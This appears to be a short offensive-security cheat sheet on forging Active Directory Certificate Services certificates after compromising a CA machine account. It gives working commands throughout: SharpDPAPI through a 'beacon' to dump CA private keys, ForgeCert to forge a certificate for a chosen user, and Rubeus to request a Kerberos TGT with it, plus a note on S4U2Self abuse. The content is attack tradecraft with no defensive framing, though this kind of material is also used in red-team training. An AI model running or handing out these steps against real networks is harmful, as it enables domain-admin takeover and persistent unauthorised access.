In many cases, AD CS roles may not be installed on the DCs, and domain admin is not needed to manage them. If a CA machine account is compromised, then certificates could be forged to maintain persistence and elevate to domain admins.
Use SharpDPAPI to enumerate CA private keys:
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machineSave the keys into .pem and use openssl to convert to .pfx.
Create a forged certificate using ForgeCert.
C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\sub-ca.pfx --CaCertPassword [ca-cert-password] --Subject "CN=User" --SubjectAltName "[target-user]@[domain-fqdn]" --NewCertPath .\auth.pfx --NewCertPassword [auth-cert-password]Request a TGT with certificate:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-user] /domain:[domain-fqdn] /enctype:aes256 /certificate:[cert-base64] /password:[cert-password] /nowrapNOTE
It is also possible to create machine certificates and use S4U2Self abuse to access any domain-joined machine/service.